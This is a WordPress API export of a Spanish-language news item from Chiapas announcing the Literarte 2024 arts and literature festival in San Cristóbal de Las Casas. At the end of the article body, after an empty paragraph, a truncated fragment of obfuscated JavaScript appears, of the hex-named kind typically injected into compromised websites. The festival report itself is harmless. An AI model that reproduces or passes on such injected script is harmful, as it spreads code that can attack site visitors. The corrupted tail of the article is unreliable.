{"id":13886,"date":"2024-01-30T04:01:33","date_gmt":"2024-01-30T04:01:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13886"},"modified":"2024-01-30T04:01:34","modified_gmt":"2024-01-30T04:01:34","slug":"preparan-festival-multicultural-literarte-2024-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13886","title":{"rendered":"Preparan Festival Multicultural Literarte 2024 en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"608\" height=\"335\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240129-WA0017.jpg\" alt=\"\" class=\"wp-image-13887\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240129-WA0017.jpg 608w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240129-WA0017-300x165.jpg 300w\" sizes=\"auto, (max-width: 608px) 100vw, 608px\" \/><\/figure>\n\n\n\n<p> \u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- La Red Global Creativa y la Expo Internacional de Arte Creativo anunciaron mediante un comunicado la realizaci\u00f3n del Festival Multicultural Literarte 2024. &#8220;Este evento, que reunir\u00e1 un destacado talento art\u00edstico y literario tanto de M\u00e9xico como del \u00e1mbito internacional, promete ser un fest\u00edn para los sentidos y el intelecto&#8221;. El escrito da a conocer parte de las actividades:Viernes 16 de febrero, Descubriendo las voces literarias y el arte en vivo.&#8221;La preapertura del festival se llevar\u00e1 a cabo a las 10 horas en los espacios del Parque de los H\u00e9roes del Musac&#8221;. &#8220;Los artistas invitados deslumbrar\u00e1n al p\u00fablico al crear obras pl\u00e1sticas en tiempo real, permitiendo a los asistentes adentrarse en los fascinantes procesos creativos de cada artista. Adem\u00e1s, los escritores internacionales deleitar\u00e1n al p\u00fablico con lecturas en voz alta, compartiendo historias de vida y poes\u00eda que tocar\u00e1n el coraz\u00f3n de todos los presentes&#8221;. El d\u00eda culminar\u00e1 con el acto de apertura &#8220;Rindiendo homenaje a la multiculturalidad de San Crist\u00f3bal&#8221; a las 17 horas en los mismos espacios del Parque de los H\u00e9roes del Musac. &#8220;La velada estar\u00e1 impregnada de m\u00fasica, bailes tradicionales como el Carnaval Zoque y la Fiesta Grande de Chiapas, y la ceremonia de corte del list\u00f3n, mientras los visitantes disfrutan de bebidas calientes bajo el cielo estrellado&#8221;. Para el s\u00e1bado 17 de febrero tendr\u00e1 lugar la Celebraci\u00f3n del arte y la literatura, &#8220;todos est\u00e1n invitados al coctel de inauguraci\u00f3n de la exposici\u00f3n &#8220;El Lenguaje del alma&#8221; en la sala de exposiciones del Musac. Esta exhibici\u00f3n promete ser un viaje visual que conecta los corazones a trav\u00e9s del arte&#8221;. &#8220;A las 16 horas, el festival contin\u00faa con la &#8220;Callejoneada po\u00e9tica&#8221;, un encantador recorrido por los pintorescos andadores de San Crist\u00f3bal, acompa\u00f1ado por el colorido cortejo de parachicos y chiapanecas&#8221;. Finalmente, a las 17 horas, el Centro Cultural El Carmen ser\u00e1 el escenario de la &#8220;Fiesta multicultural de arte y libros al aire libre&#8221;, que incluir\u00e1 la inauguraci\u00f3n de la exposici\u00f3n pict\u00f3rica &#8220;Voces del alma&#8221;, cerrando as\u00ed con broche de oro un fin de semana lleno de inspiraci\u00f3n y creatividad.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- La Red Global Creativa y la Expo Internacional de Arte Creativo anunciaron mediante un comunicado la realizaci\u00f3n del Festival Multicultural Literarte 2024. &#8220;Este evento, que reunir\u00e1 un destacado talento art\u00edstico y literario tanto de M\u00e9xico como del \u00e1mbito internacional, promete ser un fest\u00edn para los sentidos y el intelecto&#8221;. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13887,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13886","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13886"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13886\/revisions"}],"predecessor-version":[{"id":13888,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13886\/revisions\/13888"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13887"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13886"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}